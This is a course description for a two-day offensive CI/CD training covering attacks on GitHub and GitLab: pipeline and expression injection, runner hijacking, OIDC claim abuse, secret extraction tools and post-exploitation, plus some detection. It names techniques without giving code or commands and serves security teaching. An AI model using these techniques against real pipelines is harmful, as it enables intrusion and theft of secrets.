Offensive CI/CD Intermediate - 2 days - 2500€ HT
Description
Continuous Integration and Continuous Delivery (CI/CD) environments have become the backbone of modern software development. As developers heavily rely on automation to build, test, and deploy applications, these platforms have turned into highly critical targets. Securing these environments and understanding how they can be compromised is now a major challenge for security professionals and modern attackers.
Over this two-day course, participants will be exposed to a complete offensive methodology targeting the two most popular CI/CD solutions: GitHub and GitLab. The training is split into two distinct modules, diving deep into architectural concepts, pipeline abuse, runner hijacking, and post-exploitation. Through realistic corporate environments, attendees will practice complex kill chains, from unauthenticated repository access via pipeline injection to full organizational compromise and secrets extraction.
-
2 days (14 hours)
-
2 intense course modules following realistic CI/CD intrusion steps
-
Dedicated corporate environments simulating complex GitHub and GitLab organizations
-
Deep dive into real-world vulnerabilities and custom exploitation tools
Objectives
Public and prerequisites
This training is suitable for people with notions of offensive security who wish to understand how to attack and secure CI/CD environments. It is aimed primarily at pentesters, DevSecOps engineers, system administrators, and security architects, but also at any technical profile wishing to enrich their professional career with a cloud/CI security component.
-
Pentesters / Red Teamers
-
DevOps / DevSecOps engineers
-
System administrators
-
Security architects
Fluent UNIX/Linux skills, solid networking basics, and an interest in offensive security are highly recommended.
Content
Jour 1 : GitHub
Architecture & IAM: Core concepts of GitHub organizations, repositories, and identity management (users, agents, and GitHub Apps). Authentication & Authorization: Personal Access Tokens (PAT) and scopes, SSH keys, and the Roles/ACL system (who can create branches, commit, merge, or read logs). Pipelines: GitHub Actions internals, YAML definitions, available modules, and variable stores (managing secrets and the implications of protected branches). Pipelines Exploitation: Injecting malicious code via untrusted inputs, expression injections, dangerous artifacts, and environment manipulation. Exploring supply chain vectors like repo jacking and Dependabot abuse. Runners & OIDC: Hosted vs. self-hosted runners. Runner architecture, registration, and hijacking techniques. OIDC internals, token generation, and the exploitation of weak claim bindings. Tooling & Automation: Utilizing octoscan for static vulnerability analysis and nord-stream for automated CI/CD secret extraction.
Jour 2 : GitLab
Architecture & ACLs: GitLab-specific project and group hierarchies, and advanced permission models. Authentication Mechanisms: User/password flows, Personal Access Tokens (PAT) and scopes, SSH keys and external Identity Providers. Pipelines: GitLab CI/CD YAML configuration, specific environment variables, and the security implications of protected variables and branches. Runner Implementation & Hijacking: GitLab agent registration, authentication, filesystem hierarchy, and execution modes (e.g., Shell, Docker, Kubernetes). Techniques to hijack, abuse, and pivot from these runners (persistence, runner identity theft, Docker-in-Docker exploitation). Post-Exploitation: Interacting with the GitLab Ruby console, advanced secret extraction, and accessing repositories directly from the underlying filesystem. Defense & Operations: Analyzing pipeline logs, identifying security alerts, and tracking malicious CI/CD activity.
All the details regarding how the training is conducted are described on this page.